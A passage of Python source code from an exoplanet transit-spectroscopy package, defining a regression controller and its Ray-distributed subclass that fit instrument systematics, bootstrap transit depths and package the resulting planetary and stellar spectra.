            (6 values, see the data server's get_lightcurve_model).
        """
        return self.data_server_handle[0].get_lightcurve_model()
    def initialize_regression_iterators(self, nchunks=1):
        """
        Initialize the iterators required in the regression analysis.

        Parameters
        ----------
        nchunks : 'int', optional
            Number of chunks in which the iterators are split (one chunk
            per worker). The default is 1.

        Returns
        -------
        None.
        """
        cpm_parameters = \
            self.parameter_server_handle.get_regression_parameters()
        data_parameters = self.parameter_server_handle.get_data_parameters()
        self.iterators.regressor_indici = \
            select_regressors(data_parameters.ROI,
                              cpm_parameters.nwidth)
        self.iterators.bootsptrap_indici, _ = \
            make_bootstrap_samples(data_parameters.shape[-1],
                                   cpm_parameters.nboot)
        # Full-model iterator: only the first (non-bootstrapped) sample,
        # crossed with every wavelength selection.
        self.iterators.combined_full_model_indici = itertools.product(
            enumerate(self.iterators.bootsptrap_indici[:1]),
            enumerate(self.iterators.regressor_indici))
        self.iterators.n_iterators_full_model = \
            data_parameters.max_spectral_points
        # Bootstrap iterator: all nboot+1 samples crossed with every
        # wavelength selection.
        self.iterators.combined_bootstrap_model_indici = itertools.product(
            enumerate(self.iterators.bootsptrap_indici),
            enumerate(self.iterators.regressor_indici))
        self.iterators.n_iterators_bootstrap_model = \
            data_parameters.max_spectral_points*(cpm_parameters.nboot+1)
        self.chunk_iterators(nchunks=nchunks)
    def get_regression_iterators(self):
        """
        Get all iterators used in the regression analysis.

        Returns
        -------
        'SimpleNamespace'
            Namespace containing all iterators (data indici, bootstrap
            indici) for the regression analysis.
        """
        return self.iterators
    @staticmethod
    def grouper_it(it, nchunks, number_of_iterators):
        """
        Split an iterator into chunks.

        Parameters
        ----------
        it : 'itertools.product'
            Iterator to be split into chunks.
        nchunks : 'int'
            Number of chunks.
        number_of_iterators : 'int'
            Total number of items the iterator yields.

        Yields
        ------
        chunk_it : 'list'
            Chunk of the input iterator.
        stop-start : 'int'
            Number of items in this chunk; the last chunk absorbs the
            remainder of the integer division.
        """
        chunk_size = number_of_iterators // nchunks
        it = iter(it)
        # tee gives each chunk its own independent copy of the iterator;
        # islice then selects this chunk's [start, stop) window from it.
        nchunks_times_it = itertools.tee(it, nchunks)
        for i, sub_it in enumerate(nchunks_times_it):
            start = 0+i*chunk_size
            if i+1 == nchunks:
                stop = number_of_iterators
            else:
                stop = chunk_size+i*chunk_size
            chunk_it = itertools.islice(sub_it, start, stop)
            yield list(chunk_it), stop-start
    def chunk_iterators(self, nchunks=1):
        """
        Split the iterators into chunks.

        Parameters
        ----------
        nchunks : 'int', optional
            Number of chunks in which to split the iterators. The default
            is 1.

        Returns
        -------
        None.
        """
        chunked_full_model_iterator = list(
            self.grouper_it(self.iterators.combined_full_model_indici,
                            nchunks, self.iterators.n_iterators_full_model))
        chunked_bootstrap_model_iterator = list(
            self.grouper_it(self.iterators.combined_bootstrap_model_indici,
                            nchunks,
                            self.iterators.n_iterators_bootstrap_model))
        self.iterators.chunked_full_model_iterator = \
            chunked_full_model_iterator
        self.iterators.chunked_bootstrap_model_iterator = \
            chunked_bootstrap_model_iterator
    def reset_fit_parameters(self):
        """
        Reset the fitted parameters on the parameter server.

        Returns
        -------
        None.
        """
        self.parameter_server_handle.reset_parameters()
    def add_fit_parameters_to_parameter_server(self, new_parameters):
        """
        Add the fitted regression parameters to the parameter server.

        Parameters
        ----------
        new_parameters : 'dict'
            Updated fit parameters.

        Returns
        -------
        None.
        """
        self.parameter_server_handle.add_new_parameters(new_parameters)
    @staticmethod
    def get_data_chunck(data_server_handle, regression_selection,
                        bootstrap_selection):
        """
        Get a chunk of the data to be used in the regression analysis.

        Parameters
        ----------
        data_server_handle : 'regressionDataServer'
            Instance of the regressionDataServer class.
        regression_selection : 'tuple'
            Tuple containing indici defining the data and regression matrix
            for all wavelength indici.
        bootstrap_selection : 'ndarray'
            Indici defining the bootstrap sampling.

        Returns
        -------
        regression_data_selection : 'ndarray'
            Selected data to be modeled.
        regression_matirx_selection : 'ndarray'
            Data used as design matrix in the regression modeling of the
            selected data.
        """
        regression_data_selection, regression_matirx_selection = \
            data_server_handle.get_regression_data(
                regression_selection,
                bootstrap_indici=bootstrap_selection)
        return regression_data_selection, regression_matirx_selection
    @staticmethod
    def get_data_per_bootstrap_step(data_server_handle, regression_selections,
                                    bootstrap_selection):
        """
        Get all data chunks used in the regression analysis per bootstrap step.

        Parameters
        ----------
        data_server_handle : 'regressionDataServer'
            Instance of the regressionDataServer class.
        regression_selections : 'iterable'
            Iterable of regression selections (one per wavelength point).
        bootstrap_selection : 'ndarray'
            Indici defining the bootstrap sampling.

        Returns
        -------
        selection_list : 'list'
            List with all data and regression matrix selections.
        """
        selection_list = \
            data_server_handle.get_all_regression_data(
                regression_selections, bootstrap_indici=bootstrap_selection)
        return selection_list
    def run_regression_model(self):
        """
        Run the regression model.

        This method runs the regression method for the instrument systematics
        and the transit depth determination. It proceeds in two passes:
        first the full (non bootstrapped) dataset to determine the optimal
        regularization, then all bootstrap samples with that regularization
        fixed.

        Returns
        -------
        None.
        """
        # Number of chunks is the number of workers
        nchunks = self.number_of_workers
        # define the iterator chunks
        self.initialize_regression_iterators(nchunks=nchunks)
        # This launches workers on the full (non bootstrapped) data set
        # and determines the optimal regularization
        initial_fit_parameters = \
            copy.deepcopy(self.get_fit_parameters_from_server())
        initial_regularization = \
            self.get_regularization_parameters_from_server()
        workers = [
            regressionWorker(initial_fit_parameters,
                             initial_regularization,
                             iterator_chunk)
            for iterator_chunk in self.iterators.chunked_full_model_iterator
            ]
        # Workers are assigned to data servers round-robin.
        ndata_server = len(self.data_server_handle)
        # NOTE(review): in this (non-ray) controler the update loops run
        # synchronously; 'futures' holds plain return values. The ray
        # subclass relies on the same call pattern returning futures.
        futures = [w.async_update_loop(self.parameter_server_handle,
                                       self.data_server_handle[iserver%ndata_server])
                   for iserver, w in enumerate(workers)]
        # This launches workers on the bootstrapped data set + original data
        # and determines the fit parameters and error there on
        updated_regularization = \
            copy.deepcopy(self.get_regularization_parameters_from_server())
        # re-initialize workers with optimal regularization
        futures = [w.update_initial_parameters(initial_fit_parameters,
                                               updated_regularization,
                                               iterator_chunk)
                   for w, iterator_chunk in zip(
                           workers, self.iterators.chunked_bootstrap_model_iterator
                           )
                   ]
        # reset parameters on server for final run.
        self.parameter_server_handle.reset_parameters()
        futures = [w.async_update_loop(self.parameter_server_handle,
                                       self.data_server_handle[iserver%ndata_server])
                   for iserver, w in enumerate(workers)]
    def process_regression_fit(self):
        """
        Process the fitted parameters from the regression analysis.

        Builds, per bootstrap sample, the limb-darkening/band-shape
        corrected transit spectrum, the fitted systematics baseline, the
        fit residuals and the normalized spectrum, and stores all derived
        products on the parameter server.

        Returns
        -------
        None.
        """
        fit_parameters = self.get_fit_parameters_from_server()
        control_parameters = self.get_control_parameters()
        lightcurve_model, ld_correction, ld_coefficients,\
            dilution_correction, lightcurve_parameters, \
            mid_transit_time = self.get_lightcurve_model()
        # correction matrix for limb darkening correction: ratio of the
        # lightcurve at each pair of wavelengths from a 1-parameter OLS fit.
        nwave = lightcurve_model.shape[0]
        corr_matrix = np.zeros((nwave, nwave)) + np.identity(nwave)
        for i in zip(*np.triu_indices(nwave, k=1)):
            coeff, _, _ = ols(lightcurve_model[i[0], :, None],
                              lightcurve_model[i[1], :])
            corr_matrix[i] = coeff
            # lower triangle is the reciprocal of the upper triangle
            corr_matrix[i[::-1]] = 1/coeff
        fitted_baseline_list = []
        residuals_list = []
        normed_residuals_list = []
        corrected_fitted_spectrum_list = []
        normed_fitted_spectrum_list = []
        error_normed_fitted_spectrum_list = []
        wavelength_normed_fitted_spectrum_list = []
        stellar_spectrum_list = []
        # Loop over the full dataset (index 0) and all bootstrap samples.
        for (bootstrap_selection, models, fit_results,
             spectrum) in zip(self.iterators.bootsptrap_indici,
                              fit_parameters.fitted_model,
                              fit_parameters.regression_results,
                              fit_parameters.fitted_spectrum):
            # Drop the additional-regressor columns, keeping only the
            # wavelength-to-wavelength regression weights.
            W1 = np.delete(
                fit_results,
                list(np.arange(
                    control_parameters.cpm_parameters.n_additional_regressors
                    )
                    ), 1)
            K = np.identity(W1.shape[0]) - W1 * corr_matrix
            # note spectrum is already corrected for LD using renormalized LC
            # correction for difference in band shape is the corr_matrix
            if control_parameters.cpm_parameters.regularize_depth_correction:
                input_covariance = np.diag(np.ones_like(spectrum))
                input_delta = create_regularization_matrix(
                    control_parameters.cpm_parameters.reg_type_depth_correction,
                    len(spectrum), 0)
                reg_min = control_parameters.cpm_parameters.alpha_min_depth_correction
                reg_max = control_parameters.cpm_parameters.alpha_max_depth_correction
                nreg = control_parameters.cpm_parameters.n_alpha_depth_correction
                input_alpha = return_lambda_grid(reg_min, reg_max, nreg)
                results = ridge(K, spectrum, input_covariance,
                                input_delta, input_alpha)
                corrected_spectrum = results[0]
                # warn when the optimal alpha sits at the edge of the grid
                if (results[-2] <= reg_min) | (results[-2] >= reg_max):
                    warnings.warn("optimal regularization value of {} used in "
                                  "TD subtraction correction outside the "
                                  "range [{}, {}]".format(results[-2], reg_min,
                                                          reg_max))
            else:
                corrected_spectrum, _, _ = ols(K, spectrum)
            corrected_fitted_spectrum_list.append(corrected_spectrum)
            baseline_model = np.zeros(control_parameters.data_parameters.shape)
            residual = np.ma.zeros(control_parameters.data_parameters.shape)
            normed_residual = np.ma.zeros(control_parameters.data_parameters.shape)
            lc_model = lightcurve_model[..., bootstrap_selection]
            normed_spectrum = \
                np.zeros((control_parameters.
                          data_parameters.max_spectral_points))
            error_normed_spectrum = \
                np.zeros(control_parameters.
                         data_parameters.max_spectral_points)
            wavelength_normed_spectrum = \
                np.zeros((control_parameters.
                          data_parameters.max_spectral_points))
            regression_data_selections = \
                self.get_data_per_bootstrap_step(self.data_server_handle[0],
                                                 self.iterators.regressor_indici,
                                                 bootstrap_selection)
            for ipixel, (regression_selection, (regression_data_selection, _)) in\
                    enumerate(zip(self.iterators.regressor_indici,
                                  regression_data_selections)):
                (il, _), (_, _), nwave = regression_selection
                data_unscaled, wavelength, phase, covariance, mask = \
                    regression_data_selection
                lc = lc_model[il, :]
                # systematics baseline = full model minus the transit signal
                base = models[ipixel] - (corrected_spectrum)[ipixel]*lc
                baseline_model[il, :] = base
                residual[il, :] = np.ma.array(data_unscaled - models[ipixel],
                                              mask=mask)
                # refit the transit depth on baseline-normalized data
                data_normed = data_unscaled/base
                covariance_normed = covariance*np.diag(base**-2)
                normed_depth, error_normed_depth, sigma_hat = \
                    ols(lc[:, np.newaxis], data_normed-1.0,
                        covariance=covariance_normed)
                normed_residual[il, :] = np.ma.array(data_normed-1.0-normed_depth*lc,
                                                     mask=mask)
                normed_spectrum[ipixel] = \
                    normed_depth*dilution_correction[il, 0]
                error_normed_spectrum[ipixel] = \
                    error_normed_depth*dilution_correction[il, 0]
                wavelength_normed_spectrum[ipixel] = wavelength
            fitted_baseline_list.append(baseline_model)
            residuals_list.append(residual)
            normed_residuals_list.append(normed_residual)
            normed_fitted_spectrum_list.append(normed_spectrum)
            error_normed_fitted_spectrum_list.append(
                error_normed_spectrum)
            wavelength_normed_fitted_spectrum_list.append(
                wavelength_normed_spectrum)
            stellar_spectrum_list.append(corrected_spectrum/normed_spectrum)
        corrected_fitted_spectrum = np.array(corrected_fitted_spectrum_list)
        fitted_baseline = np.array(fitted_baseline_list)
        fit_residuals = np.ma.array(residuals_list)
        normed_fit_residuals = np.ma.array(normed_residuals_list)
        normed_fitted_spectrum = np.array(normed_fitted_spectrum_list)
        error_normed_fitted_spectrum = \
            np.array(error_normed_fitted_spectrum_list)
        wavelength_normed_fitted_spectrum =\
            np.array(wavelength_normed_fitted_spectrum_list)
        stellar_spectrum = np.array(stellar_spectrum_list)
        prosessed_results = \
            {'corrected_fitted_spectrum': corrected_fitted_spectrum,
             'fitted_baseline': fitted_baseline,
             'fit_residuals': fit_residuals,
             'normed_fit_residuals': normed_fit_residuals,
             'normed_fitted_spectrum': normed_fitted_spectrum,
             'error_normed_fitted_spectrum': error_normed_fitted_spectrum,
             'wavelength_normed_fitted_spectrum':
                 wavelength_normed_fitted_spectrum,
             'stellar_spectrum': stellar_spectrum}
        self.add_fit_parameters_to_parameter_server(prosessed_results)
    def post_process_regression_fit(self):
        """
        Post processing of the regression analysis.

        Masks poorly fit wavelengths, derives bootstrap median spectra with
        uncertainties (mad_std) and 90% confidence intervals, packages the
        results as SpectralData / SpectralDataTimeSeries products and
        stores them on the parameter server.

        Returns
        -------
        None.
        """
        fit_parameters = self.get_fit_parameters_from_server()
        control_parameters = self.get_control_parameters()
        lightcurve_model, ld_correction, ld_coefficients, \
            dilution_correction, lightcurve_parameters, \
            mid_transit_time = self.get_lightcurve_model()
        # Flag wavelengths whose full-dataset MSE exceeds sigma_cut times
        # the median MSE, and broadcast the flag over all bootstrap samples.
        sigma_cut = control_parameters.cpm_parameters.sigma_mse_cut
        bad_wavelength_mask = \
            (fit_parameters.fitted_mse[0, :] >
             np.median(fit_parameters.fitted_mse[0, :])*sigma_cut)
        bad_wavelength_mask = \
            np.repeat(bad_wavelength_mask[np.newaxis, :],
                      control_parameters.cpm_parameters.nboot+1,
                      axis=0)
        fitted_spectrum = \
            np.ma.array(fit_parameters.corrected_fitted_spectrum.copy(),
                        mask=bad_wavelength_mask.copy())
        stellar_spectrum = \
            np.ma.array(fit_parameters.stellar_spectrum.copy(),
                        mask=bad_wavelength_mask.copy())
        normed_spectrum = \
            np.ma.array(fit_parameters.normed_fitted_spectrum.copy(),
                        mask=bad_wavelength_mask.copy())
        error_normed_spectrum = \
            np.ma.array(fit_parameters.error_normed_fitted_spectrum.copy(),
                        mask=bad_wavelength_mask.copy())
        wavelength_normed_spectrum = \
            np.ma.array(
                fit_parameters.wavelength_normed_fitted_spectrum.copy(),
                mask=bad_wavelength_mask.copy())
        if lightcurve_parameters['transittype'] == 'secondary':
            from cascade.exoplanet_tools import transit_to_eclipse
            normed_spectrum, error_normed_spectrum = \
                transit_to_eclipse(normed_spectrum,
                                   uncertainty=error_normed_spectrum)
        # transfrom to percent by multiplying by 100.
        # Note!!!!! this has to be done after transit_to_eclipse!!!!!
        normed_spectrum.data[...] = normed_spectrum.data*100
        error_normed_spectrum.data[...] = error_normed_spectrum.data*100
        from astropy.stats import mad_std
        # bootstrapped spectrum (not normalized)
        median_not_normalized_depth_bootstrap = \
            np.ma.median(fitted_spectrum[1:, :], axis=1)
        spectrum_bootstrap = \
            np.ma.median(fitted_spectrum[1:, :], axis=0)
        error_spectrum_bootstrap = \
            mad_std((fitted_spectrum[1:, :].T -
                     median_not_normalized_depth_bootstrap).T,
                    axis=0, ignore_nan=True)
        # 90% confidence interval non normalized transit depth
        # (5th / 50th / 95th percentiles of the bootstrap medians)
        n = len(median_not_normalized_depth_bootstrap)
        sort = sorted(median_not_normalized_depth_bootstrap)
        nn_TD_min, nn_TD, nn_TD_max = \
            (sort[int(n * 0.05)], sort[int(n * 0.5)], sort[int(n * 0.95)])
        # normalized spectrum
        median_depth = np.ma.median(normed_spectrum[0, :])
        # bootstrapped normalized spectrum
        median_depth_bootstrap = np.ma.median(normed_spectrum[1:, :], axis=1)
        normed_spectrum_bootstrap = \
            np.ma.median(normed_spectrum[1:, :], axis=0)
        error_normed_spectrum_bootstrap = \
            mad_std((normed_spectrum[1:, :].T - median_depth_bootstrap).T,
                    axis=0, ignore_nan=True)
        # 90% confidence interval
        n = len(median_depth_bootstrap)
        sort = sorted(median_depth_bootstrap)
        TD_min, TD, TD_max = \
            (sort[int(n * 0.05)], sort[int(n * 0.5)], sort[int(n * 0.95)])
        # bootstrapped stellar spectrum
        median_stellar_spectrum = np.ma.median(stellar_spectrum[1:, :], axis=1)
        stellar_spectrum_bootstrap = \
            np.ma.median(stellar_spectrum[1:, :], axis=0)
        error_stellar_spectrum_bootstrap = \
            mad_std((stellar_spectrum[1:, :].T - median_stellar_spectrum).T,
                    axis=0, ignore_nan=True)
        # 90% confidence interval
        n = len(median_stellar_spectrum)
        sort = sorted(median_stellar_spectrum)
        SF_min, SF, SF_max = \
            (sort[int(n * 0.05)], sort[int(n * 0.5)], sort[int(n * 0.95)])
        observing_time = control_parameters.data_parameters.time_bjd_zero
        data_product = control_parameters.data_parameters.data_product
        curent_data = time_module.localtime()
        creation_time = '{}_{}_{}:{}_{}_{}'.format(curent_data.tm_year,
                                                   curent_data.tm_mon,
                                                   curent_data.tm_mday,
                                                   curent_data.tm_hour,
                                                   curent_data.tm_min,
                                                   curent_data.tm_sec)
        # FITS-style auxiliary header keywords for the output products.
        auxilary_data = {'TDDEPTH': [nn_TD_min, nn_TD, nn_TD_max],
                         'MODELRP': lightcurve_parameters['rp'],
                         'MODELA': lightcurve_parameters['a'],
                         'MODELINC': lightcurve_parameters['inc']*u.deg,
                         'MODELECC': lightcurve_parameters['ecc'],
                         'MODELW': lightcurve_parameters['w']*u.deg,
                         'MODELEPH': lightcurve_parameters['t0'],
                         'MODELPER': lightcurve_parameters['p'],
                         'VERSION': __version__,
                         'CREATIME': creation_time,
                         'OBSTIME': observing_time,
                         'MIDTTIME': mid_transit_time,
                         'DATAPROD': data_product}
        # non normalized dataset
        wavelength_unit = control_parameters.data_parameters.wavelength_unit
        data_unit = control_parameters.data_parameters.data_unit
        non_normalized_exoplanet_spectrum_bootstrap = \
            SpectralData(wavelength=wavelength_normed_spectrum[0, :],
                         wavelength_unit=wavelength_unit,
                         data=spectrum_bootstrap,
                         data_unit=data_unit,
                         uncertainty=error_spectrum_bootstrap,
                         )
        non_normalized_exoplanet_spectrum_bootstrap.add_auxilary(
            **auxilary_data
            )
        # non normalized stellar dataset
        stellar_auxilary_data = copy.deepcopy(auxilary_data)
        stellar_auxilary_data.pop('TDDEPTH')
        stellar_auxilary_data['STLRFLUX'] = [SF_min, SF, SF_max]
        data_unit = control_parameters.data_parameters.data_unit
        non_normalized_stellar_spectrum_bootstrap = \
            SpectralData(wavelength=wavelength_normed_spectrum[0, :],
                         wavelength_unit=wavelength_unit,
                         data=stellar_spectrum_bootstrap,
                         data_unit=data_unit,
                         uncertainty=error_stellar_spectrum_bootstrap,
                         )
        non_normalized_stellar_spectrum_bootstrap.add_auxilary(
            **stellar_auxilary_data
            )
        # normalized dataset
        auxilary_data['TDDEPTH'] = [median_depth]
        data_unit = u.percent
        exoplanet_spectrum = \
            SpectralData(wavelength=wavelength_normed_spectrum[0, :],
                         wavelength_unit=wavelength_unit,
                         data=normed_spectrum[0, :],
                         data_unit=data_unit,
                         uncertainty=error_normed_spectrum[0, :],
                         )
        exoplanet_spectrum.add_auxilary(**auxilary_data)
        # normalized bootstrapped dataset
        auxilary_data['TDDEPTH'] = [TD_min, TD, TD_max]
        exoplanet_spectrum_bootstrap = \
            SpectralData(wavelength=wavelength_normed_spectrum[0, :],
                         wavelength_unit=wavelength_unit,
                         data=normed_spectrum_bootstrap,
                         data_unit=data_unit,
                         uncertainty=error_normed_spectrum_bootstrap,
                         )
        exoplanet_spectrum_bootstrap.add_auxilary(**auxilary_data)
        fitted_transit_model = \
            SpectralDataTimeSeries(
                wavelength=wavelength_normed_spectrum[0, :],
                wavelength_unit=wavelength_unit,
                data=(lightcurve_model.T*normed_spectrum_bootstrap).T,
                data_unit=data_unit,
                uncertainty=(lightcurve_model.T *
                             error_normed_spectrum_bootstrap).T,
                time=fit_parameters.fitted_time[0, 0, :],
                time_unit=control_parameters.data_parameters.time_unit
                )
        fitted_transit_model.add_auxilary(**auxilary_data)
        # timeseries baseline: per (wavelength, time) sample, take the
        # bootstrap median and mad_std over all bootstrap realizations that
        # contain that time stamp.
        nboot, nwave, ntime = fit_parameters.fitted_time.shape
        uniq_time = fit_parameters.fitted_time[0, 0, :]
        baseline_bootstrap = np.zeros((nwave, ntime))
        normed_residual_bootstrap = np.ma.zeros((nwave, ntime))
        error_baseline_bootstrap = np.zeros_like(baseline_bootstrap)
        error_normed_residual_bootstrap = np.ma.zeros((nwave, ntime))
        for it, time in enumerate(uniq_time):
            for il in range(nwave):
                idx = np.where(fit_parameters.fitted_time[1:, il, :] == time)
                selection = \
                    fit_parameters.fitted_baseline[idx[0]+1, il, idx[1]]
                baseline_bootstrap[il, it] = np.ma.median(selection)
                error_baseline_bootstrap[il, it] = mad_std(selection,
                                                           ignore_nan=True)
                selection = \
                    fit_parameters.normed_fit_residuals[idx[0]+1, il, idx[1]]
                normed_residual_bootstrap[il, it] = np.ma.median(selection)
                error_normed_residual_bootstrap[il, it] = mad_std(selection,
                                                                  ignore_nan=True)
        time_baseline_bootstrap = uniq_time
        wavelength_baseline_bootstrap = wavelength_normed_spectrum[0, :]
        # propagate the bad-wavelength mask to the timeseries products
        baseline_mask = exoplanet_spectrum_bootstrap.mask
        baseline_mask = \
            np.repeat(baseline_mask[:, np.newaxis],
                      len(uniq_time),
                      axis=1)
        residual_mask = np.logical_or(normed_residual_bootstrap.mask,
                                      baseline_mask)
        data_unit = control_parameters.data_parameters.data_unit
        time_unit = control_parameters.data_parameters.time_unit
        fitted_systematics_bootstrap = SpectralDataTimeSeries(
            wavelength=wavelength_baseline_bootstrap,
            wavelength_unit=wavelength_unit,
            data=baseline_bootstrap,
            data_unit=data_unit,
            uncertainty=error_baseline_bootstrap,
            time=time_baseline_bootstrap,
            time_unit=time_unit,
            mask=baseline_mask)
        data_unit = u.dimensionless_unscaled
        time_unit = control_parameters.data_parameters.time_unit
        fitted_residuals_bootstrap = SpectralDataTimeSeries(
            wavelength=wavelength_baseline_bootstrap,
            wavelength_unit=wavelength_unit,
            data=normed_residual_bootstrap,
            data_unit=data_unit,
            uncertainty=error_normed_residual_bootstrap,
            time=time_baseline_bootstrap,
            time_unit=time_unit,
            mask=residual_mask)
        post_prosessed_results = \
            {'exoplanet_spectrum': exoplanet_spectrum,
             'exoplanet_spectrum_bootstrap': exoplanet_spectrum_bootstrap,
             'non_normalized_exoplanet_spectrum_bootstrap':
                 non_normalized_exoplanet_spectrum_bootstrap,
             'fitted_systematics_bootstrap': fitted_systematics_bootstrap,
             'fitted_residuals_bootstrap': fitted_residuals_bootstrap,
             'fitted_transit_model': fitted_transit_model,
             'non_normalized_stellar_spectrum_bootstrap':
                 non_normalized_stellar_spectrum_bootstrap}
        self.add_fit_parameters_to_parameter_server(post_prosessed_results)
@ray.remote
class rayRegressionControler(regressionControler):
    """
    Ray remote-actor wrapper around the regressionControler class.

    This subclass overrides the server-facing methods of the base
    controler so that the parameter server, the data servers and the
    regression workers all run as Ray actors.  Every call to a server
    goes through Ray's ``.remote()``/``ray.get`` API, allowing the
    regression analysis to be distributed over multiple processes.
    """
    def __init__(self, cascade_configuration, dataset, regressor_dataset,
                 number_of_workers=1, number_of_data_servers=1):
        """
        Initialize the Ray regression controler.

        All arguments are passed unchanged to regressionControler.
        """
        super().__init__(cascade_configuration, dataset, regressor_dataset,
                         number_of_workers=number_of_workers,
                         number_of_data_servers=number_of_data_servers)
    def instantiate_parameter_server(self):
        """
        Create a handle to the parameter server.

        The handle stored in ``self.parameter_server_handle`` is a Ray
        actor handle of rayRegressionParameterServer.

        Returns
        -------
        None.
        """
        self.parameter_server_handle = \
            rayRegressionParameterServer.remote(self.cascade_configuration)
    def instantiate_data_server(self, dataset, regressor_dataset):
        """
        Create the handles to the data servers.

        One rayRegressionDataServer actor is created per configured data
        server; the list of actor handles is stored in
        ``self.data_server_handle``.

        Parameters
        ----------
        dataset : TYPE
            Dataset to be fitted (forwarded to the data servers).
        regressor_dataset : TYPE
            Dataset used to build the regression matrix (forwarded to the
            data servers).

        Returns
        -------
        None.
        """
        # self.data_server_handle = \
        #     [rayRegressionDataServer.remote(dataset, regressor_dataset)
        #      for _ in range(self.number_of_workers)]
        self.data_server_handle = \
            [rayRegressionDataServer.remote(dataset, regressor_dataset)
             for _ in range(self.number_of_data_servers)]
    def initialize_servers(self):
        """
        Initialize both the data and the parameter server.

        Note that the order of initialization is important: first the
        data servers and then the parameter server, as the parameter
        server is initialized against the (already initialized) first
        data server.

        Returns
        -------
        None.
        """
        # ftr = self.data_server_handle[0].\
        #     initialize_data_server.remote(self.parameter_server_handle)
        ftr = [server.initialize_data_server.remote(self.parameter_server_handle)
               for server in self.data_server_handle]
        ray.get(ftr)
        ftr = self.parameter_server_handle.\
            initialize_parameter_server.remote(self.data_server_handle[0])
        ray.get(ftr)
    def get_fit_parameters_from_server(self):
        """
        Grab the fitted regression parameters from the parameter server.

        Returns
        -------
        TYPE
            Fitted-parameters object as returned by the parameter
            server's ``get_fitted_parameters`` method.
        """
        return ray.get(
            self.parameter_server_handle.get_fitted_parameters.remote()
        )
    def get_regularization_parameters_from_server(self):
        """
        Get the regularization parameters from the parameter server.

        Returns
        -------
        TYPE
            Regularization object as returned by the parameter server's
            ``get_regularization`` method.
        """
        return ray.get(
            self.parameter_server_handle.get_regularization.remote()
        )
    def get_control_parameters(self):
        """
        Get the regression control parameters from the parameter server.

        Returns
        -------
        control_parameters : SimpleNamespace
            Namespace with two attributes: ``data_parameters`` (from the
            parameter server's ``get_data_parameters``) and
            ``cpm_parameters`` (from ``get_regression_parameters``).
        """
        control_parameters = SimpleNamespace()
        control_parameters.data_parameters = \
            ray.get(self.parameter_server_handle.get_data_parameters.remote())
        control_parameters.cpm_parameters = \
            ray.get(
                self.parameter_server_handle.get_regression_parameters.remote()
            )
        return control_parameters
    @ray.method(num_returns=6)
    def get_lightcurve_model(self):
        """
        Get the lightcurve model from the first data server.

        Returns
        -------
        TYPE
            The six values returned by the data server's
            ``get_lightcurve_model`` method (hence the ``num_returns=6``
            Ray method decoration).
        """
        return ray.get(self.data_server_handle[0].get_lightcurve_model.remote())
    def initialize_regression_iterators(self, nchunks=1):
        """
        Initialize all iterators used in the regression analysis.

        Builds the regressor-selection and bootstrap-sample iterators,
        the combined (bootstrap x regressor) product iterators for both
        the full-data model and the bootstrapped models, and finally
        splits them into ``nchunks`` chunks.

        Parameters
        ----------
        nchunks : 'int', optional
            Number of chunks the iterators are split into (typically one
            per worker). Default is 1.

        Returns
        -------
        None.
        """
        cpm_parameters = \
            ray.get(self.parameter_server_handle.
                    get_regression_parameters.remote())
        data_parameters = \
            ray.get(self.parameter_server_handle.get_data_parameters.remote())
        self.iterators.regressor_indici = \
            select_regressors(data_parameters.ROI,
                              cpm_parameters.nwidth)
        self.iterators.bootsptrap_indici, _ = \
            make_bootstrap_samples(data_parameters.shape[-1],
                                   cpm_parameters.nboot)
        # The full model iterates only over the first (non-bootstrapped)
        # sample.
        self.iterators.combined_full_model_indici = itertools.product(
            enumerate(self.iterators.bootsptrap_indici[:1]),
            enumerate(self.iterators.regressor_indici))
        self.iterators.n_iterators_full_model = \
            data_parameters.max_spectral_points
        self.iterators.combined_bootstrap_model_indici = itertools.product(
            enumerate(self.iterators.bootsptrap_indici),
            enumerate(self.iterators.regressor_indici))
        self.iterators.n_iterators_bootstrap_model = \
            data_parameters.max_spectral_points*(cpm_parameters.nboot+1)
        self.chunk_iterators(nchunks=nchunks)
    def reset_fit_parameters(self):
        """
        Reset the fitted parameters on the parameter server.

        Returns
        -------
        None.
        """
        ray.get(self.parameter_server_handle.reset_parameters.remote())
    @staticmethod
    def get_data_chunck(data_server_handle, regression_selection,
                        bootstrap_selection):
        """
        Get a chunk of the data to be used in the regression analysis.

        Parameters
        ----------
        data_server_handle : 'regressionDataServer'
            Ray actor handle of the regressionDataServer class.
        regression_selection : 'tuple'
            Tuple containing indici defining the data and regression
            matrix for all wavelength indici.
        bootstrap_selection : 'ndarray'
            Indici defining the bootstrap sampling.

        Returns
        -------
        regression_data_selection : 'ndarray'
            Selected data to be modeled.
        regression_matirx_selection : 'ndarray'
            Data used as design matrix in regression modeling of the
            selected data.
        """
        regression_data_selection, regression_matirx_selection = \
            ray.get(data_server_handle.get_regression_data.remote(
                regression_selection,
                bootstrap_indici=bootstrap_selection))
        return regression_data_selection, regression_matirx_selection
    @staticmethod
    def get_data_per_bootstrap_step(data_server_handle, regression_selections,
                                    bootstrap_selection):
        """
        Get all data chunks used in the regression per bootstrap step.

        Parameters
        ----------
        data_server_handle : 'regressionDataServer'
            Ray actor handle of the regressionDataServer class.
        regression_selections : TYPE
            Collection of regression selections, forwarded to the data
            server's ``get_all_regression_data`` method.
        bootstrap_selection : 'ndarray'
            Indici defining the bootstrap sampling.

        Returns
        -------
        selection_list : 'list'
            List with all data and regression matrix selections.
        """
        selection_list = \
            ray.get(data_server_handle.get_all_regression_data.remote(
                regression_selections, bootstrap_indici=bootstrap_selection))
        return selection_list
    def add_fit_parameters_to_parameter_server(self, new_parameters):
        """
        Add the fitted regression parameters to the parameter server.

        Parameters
        ----------
        new_parameters : TYPE
            New parameters, forwarded to the parameter server's
            ``add_new_parameters`` method.

        Returns
        -------
        None.
        """
        ray.get(
            self.parameter_server_handle.
            add_new_parameters.remote(new_parameters)
        )
    def run_regression_model(self):
        """
        Run the regression model.

        This method runs the regression for the instrument systematics
        and the transit depth determination in two passes:

        1) Workers run on the full (non-bootstrapped) data set to
           determine the optimal regularization.
        2) Workers are re-initialized with that regularization and run on
           the bootstrapped data sets (plus the original data) to
           determine the fit parameters and the errors thereon.

        Returns
        -------
        None.
        """
        # number of data chunks is the number of workers
        nchunks = self.number_of_workers
        # define the iterator chunks
        self.initialize_regression_iterators(nchunks=nchunks)
        # This launches workers on the full (non bootstrapped) data set
        # and determines the optimal regularization
        initial_fit_parameters = \
            copy.deepcopy(self.get_fit_parameters_from_server())
        initial_regularization = \
            self.get_regularization_parameters_from_server()
        workers = [
            rayRegressionWorker.remote(initial_fit_parameters,
                                       initial_regularization,
                                       iterator_chunk)
            for iterator_chunk in self.iterators.chunked_full_model_iterator
        ]
        # Workers are distributed round-robin over the data servers.
        ndata_servers=len(self.data_server_handle)
        futures = [w.async_update_loop.remote(self.parameter_server_handle,
